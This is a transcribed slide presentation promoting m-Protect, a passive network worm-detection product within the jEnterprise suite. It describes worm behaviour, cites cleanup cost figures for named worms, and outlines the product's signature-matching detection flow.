jEnterprise Suite For Network Monitoring and Security

Download Report

Transcript jEnterprise Suite For Network Monitoring and Security 

jEnterprise Suite For Network
Monitoring and Security
Dr. Sureswaran Ramadass, Dr. Rahmat Budiarto, Mr. Ahmad Manasrah, Mr. M. F. Pasha
Agenda
 Problem Statement.
What is Worm
Worms Damage Effects
Cost of Worms
Solution
Technology
The Problem
 Networks nowadays suffering from
• - Viruses, Worms.
• - Trojans, Spy-wares
• - Ad-wares, Hijackers, Pop generators
- Spam, Intrusion and many more.
 If you are connected to the internet (home, corporate) then,
your machine is exposed to the Internet world. And hence you
are vulnerable against Worms and Viruses.
 Virus and Worm are the biggest contributors to today’s network
problems. And thus, firewall and antivirus alone are not enough
To protect your organization from the blended threats.
What is Worm?

Worms are programs that replicate themselves from system to
system without the use of a host file.

Although worms generally exist inside of other files, often Word
or Excel documents.

Usually the worm will release a document that already has the
"worm" macro inside the document. The entire document will
travel from computer to computer, so the entire document
should be considered the worm.
W32.Mydoom.AX@mm is an example of a worm
Worms Damage Effects
Once the host is infected , Worms can:






Steal YOUR private info and distribute it to all the users in your
email database.
Send dummy traffic to paralyze your network.
Destroy key system files that would damage and crash your
computer.
Destroy database system within your server.
Irrecoverably overwrites your personal files .
Slows down your PC.
Cost of Worms

Cost for cleanup of worms worldwide.
Sobig: USD 37.1 billion
 MyDoom: USD 22.6 billion
 Klez: USD 19.8 billion
 Nachi: USD 13 billion
 Mimail: USD 11.5 billion
 Swen: USD 10.4 billion
 Love Bug: USD 8.8 billion
 Bugbear: USD 3.9 billion

Source: www.wholesecurity.com
Cost of Worms…

Cost for cleanup of worms in Malaysia.
Code Red: RM 22 million
 Nimda: RM 22 million
 Blaster: RM 31 million
 Nachi: RM 31 million


90% of desktop computers in a Malaysian internet company
experienced downtime caused by Blasted.D worm. (August
2003)
Source: NISER study
What Do You Need?

A holistic approach on the security strategies you currently
have in place MUST be adopted To protect your organization
from the new generation of blended Threats.

A solution that covers loopholes left by other security products
for an all round protection and able to detect internal worm
attack as well as external.

An updated Software with worm signatures armed with a
warning, alerting mechanism to aware security team to take
the proper action.

Advising and Recommendation
What Do You Need?
The Answer is
m-Protect!!










Easy to install and use.
Low memory requirements.
Detects worm activity on the wire .
Live updates from m-Protect database server that consists of a
comprehensive list of all known worms.
Works passively to scan network traffic for worms.
Alerts you of a potential worm attack via synthesized voice
warning and visual messages as well as sms and emails.
Pinpoints the source of the computer that is broadcasting the
worm packets.
Works hand in hand with 3rd party anti – virus tools.
Able to detect worms with multiple signatures.
Detect inside/outside worm attacks.
Why m-Protect?

m-Protect would alert everyone in the network regarding the
worm attack



Locate source of the problem.
Provide possible solutions
Besides propagation via the internet connection, Worms can
still reach the internal network by:




laptops.
external media (cd, thumbdrive).
wireless access points.
encrypted/ zipped emails.
Border defenses is of no use if the worm is already inside
the internal network.
m-Protect in action
WARNING
WARNING
WARNING
WARNING
Infected PC inside your LAN
Border firewall
Not Protected PC, now will originate the
attack again
ALERT
ALERT
ALERT
m-Protect in action…
• Computers without sufficient
antivirus / patch will be infected.
• Such computers will create
unwanted traffic in its attempts to
infect others.
• All the network users will
experience “network outage”
Technology-Modules
Technology-Framework
1010101010101010100111110001111000011100000111110000011110000
Capturing
No
Packet Provider
No
IP Packet ?
Yes
Apply Rule
Suspicious SRC & DST
port numbers?
Load Detection Rule
Get Next Rule
No
Continue Monitoring
Rule
matched?
Yes
Display worm info.
Trigger Alert
Technology- Enterprise
Technology- Enterprise…
Technology- Enterprise…
The Product…
Thank You
Q&A